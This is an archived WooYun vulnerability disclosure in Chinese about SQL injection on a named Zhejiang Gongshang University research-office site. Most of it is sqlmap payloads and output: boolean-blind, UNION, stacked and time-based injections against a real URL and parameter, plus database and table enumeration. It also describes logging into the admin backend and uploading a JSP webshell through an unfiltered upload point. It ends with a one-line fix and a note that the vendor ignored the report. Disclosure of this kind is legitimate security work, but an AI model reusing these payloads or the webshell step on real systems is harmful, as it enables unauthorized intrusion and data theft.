乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-19: 细节已通知厂商并且等待厂商处理中 2015-01-24: 厂商已经主动忽略漏洞,细节向公众公开
浙江工商大学某站点SQL注入#01
001x注入点http://kyc.zjgsu.edu.cn/kyc_new/notify.do?ActionMethod=view&id=1543
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ActionMethod=view&id=1543' AND 6962=6962 AND 'tdtU'='tdtU Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: ActionMethod=view&id=-2556' UNION ALL SELECT 28,CHAR(58) CHAR(118) CHAR(118) CHAR(110)CHAR(58) CHAR(112) CHAR(104) CHAR(110) CHAR(102) CHAR(122) CHAR(76) CHAR(90) CHAR(69) CHAR(101) CHAR(104) CHAR(58) CHAR(97) CHAR(109) CHAR(110) CHAR(58),28,28-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ActionMethod=view&id=1543'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ActionMethod=view&id=1543' WAITFOR DELAY '0:0:5'-----[10:30:07] [INFO] the back-end DBMS is Microsoft SQL Serverweb application technology: JSPback-end DBMS: Microsoft SQL Server 2000[10:30:07] [INFO] fetching database names[10:30:07] [INFO] the SQL query used returns 7 entries[10:30:07] [INFO] resumed: "kyc"[10:30:07] [INFO] resumed: "master"[10:30:07] [INFO] resumed: "model"[10:30:07] [INFO] resumed: "msdb"[10:30:07] [INFO] resumed: "Northwind"[10:30:07] [INFO] resumed: "pubs"[10:30:07] [INFO] resumed: "tempdb"available databases [7]:[*] kyc[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] tempdb
002x跑出的数据库,下一步看权限
003x当前数据库的所有表
Database: kyc+----------------------+---------+| Table | Entries |+----------------------+---------+| dbo.[Work] | 9471 || dbo.oldwork | 6563 || dbo.ProjectPoints | 3385 || dbo.Journal | 1831 || dbo.Journal_temp | 1824 || dbo.GroupUser | 1629 || dbo.newTable1 | 1545 || dbo.RegUser | 1545 || dbo.OutlayDetail | 1345 || dbo.pointshz | 1295 || dbo.notify | 1209 || dbo.Outlay | 1091 || dbo.Award | 592 || dbo.[??] | 290 || dbo.news | 257 || dbo.Communication | 252 || dbo.TypePoints | 113 || dbo.priv | 82 || dbo.func | 51 || dbo.College | 46 || dbo.Department | 46 || dbo.document | 43 || dbo.sort | 39 || dbo.fff | 38 || dbo.RankTypeObj | 33 || dbo.Tables | 29 || dbo.AwardTypeObj | 25 || dbo.OrderTypeObj | 22 || dbo.pbcatedt | 21 || dbo.kill_kk | 20 || dbo.pbcatfmt | 20 || dbo.PrjSource | 20 || dbo.sere | 20 || dbo.PrjRank | 19 || dbo.WorkMember | 15 || dbo.zlmb_tr | 15 || dbo.orgs | 14 || dbo.SignTypeObj | 12 || dbo.manager | 10 || dbo.download | 9 || dbo.kyjhhyh | 9 || dbo.WcTypeObj | 9 || dbo.AwardSignTypeObj | 6 || dbo.IndexTypeObj | 6 || dbo.PrjAwdRatio | 6 || dbo.ProductionType | 6 || dbo.stuff | 6 || dbo.sysconstraints | 6 || dbo.BookWcTypeObj | 5 || dbo.glgz | 5 || dbo.status | 5 || dbo.UserGroup | 5 || dbo.[level] | 3 || dbo.dlmb_tr | 3 || dbo.syssegments | 3 || dbo.harvest | 2 || dbo.prjlevel | 2 || dbo.project | 2 || dbo.D99_REG | 1 || dbo.depart_z | 1 || dbo.guizu | 1 || dbo.kycxcl | 1 |+----------------------+---------+
004x找后台,找管理员密码并进入后台http://kyc.zjgsu.edu.cn/kyc_new/login.do
001x疑似之前已经被侵入过
002x上传点,直接上传jsp菜刀马,未做任何过滤
防sql注入,上传服务端验证
危害等级:无影响厂商忽略
忽略时间:2015-01-24 14:18
暂无